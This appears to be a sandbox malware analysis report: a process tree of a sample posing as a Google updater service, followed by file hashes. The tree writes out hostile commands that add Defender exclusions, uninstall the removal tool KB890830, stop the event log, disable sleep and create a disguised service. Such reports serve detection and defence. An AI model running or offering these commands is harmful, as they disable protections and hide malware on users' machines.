        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\msdr.exe | "C:\Windows\System32\msdr.exe" | PID:3148
            - Drops file in Drivers directory
            - Executes dropped EXE
            - Drops file in System32 directory
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory
            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID:2468
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart | PID:1084
                - Suspicious use of WriteProcessMemory
                C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart | PID:4192
            C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 | PID:3340
                - Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 | PID:560
                - Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 | PID:644
                - Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 | PID:4856
                - Suspicious use of AdjustPrivilegeToken
            C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID:232
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory
            C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" | PID:468
                - Launches sc.exe
            C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" | PID:3848
                - Launches sc.exe
            C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop eventlog | PID:800
                - Launches sc.exe
            C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" | PID:3936
                - Launches sc.exe
                C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:660
C:\ProgramData\Google\Chrome\updater.exe | C:\ProgramData\Google\Chrome\updater.exe | PID:2128
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force | PID:1664
        - Command and Scripting Interpreter: PowerShell
        - Drops file in System32 directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:4152
    C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart | PID:2152
        C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:2260
        C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart | PID:4148
    C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 | PID:4788
        - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:3636
    C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 | PID:2528
        - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:4556
    C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 | PID:2204
        - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:1344
    C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 | PID:3548
        - Suspicious use of AdjustPrivilegeToken
        C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:4692
    C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID:2460
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID:4944
    C:\Windows\system32\dialer.exe | dialer.exe | PID:3816
        - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\wbem\wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | PID:1668
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 2KB
MD5: d0c46cad6c0778401e21910bd6b56b70
SHA1: 7be418951ea96326aca445b8dfe449b2bfa0dca6
SHA256: 9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512: 057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

Filesize: 16KB
MD5: 64db36e39e3afbf53dc364446aa67df4
SHA1: b796cf9db59bdfa4f813d134644298efd6811013
SHA256: 216232aa2a1bb17bafacf42bf201dd618cd074ea0f6cda78eef3a5d7c7bfab4c
SHA512: 258d17555b1972c19b21dfbbc324e8b2614819b18b5877a3932aa42028d38490efcd3f9da5554dbc80afd9eabd741934215b1075457e259ba8cb32bb59a3dc5a

Filesize: 11KB
MD5: 78bc10ef0270acdf864b2cf3619c21e7
SHA1: 9b7608380d16a2f9ddf2ab75068543ae58a8834d
SHA256: 8b81847910451e2cc4cdc98e0d8593929575a7d5d48930ce44168e95e0c3c7f8
SHA512: 3c768b92daf87a709909aa70f6de41a23bae92dff06320635b383852f3724625cdbd1314de2bd89b10611a494a1318c38e750acb8334044b446b721415f61bff

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 5.3MB
MD5: 3974c5d0b92366bbc9af950c8d7f898d
SHA1: 1b141b9cced64d1b86cd9d3460062ee7ecd34357
SHA256: c88dbfa8510ba03e204e2458434be95cb232f34a0b530a299ba6fdecd3c39820
SHA512: 6b786fcf6ad40c3f8007e55242db7794f640177f3394a49a3ac9dc3b6cf3588eefe8e3db8ed21d9fcc3962de50d48c6c28867ab92a7da324389e19b9642170fa

Filesize: 3KB
MD5: 00930b40cba79465b7a38ed0449d1449
SHA1: 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256: eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512: cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62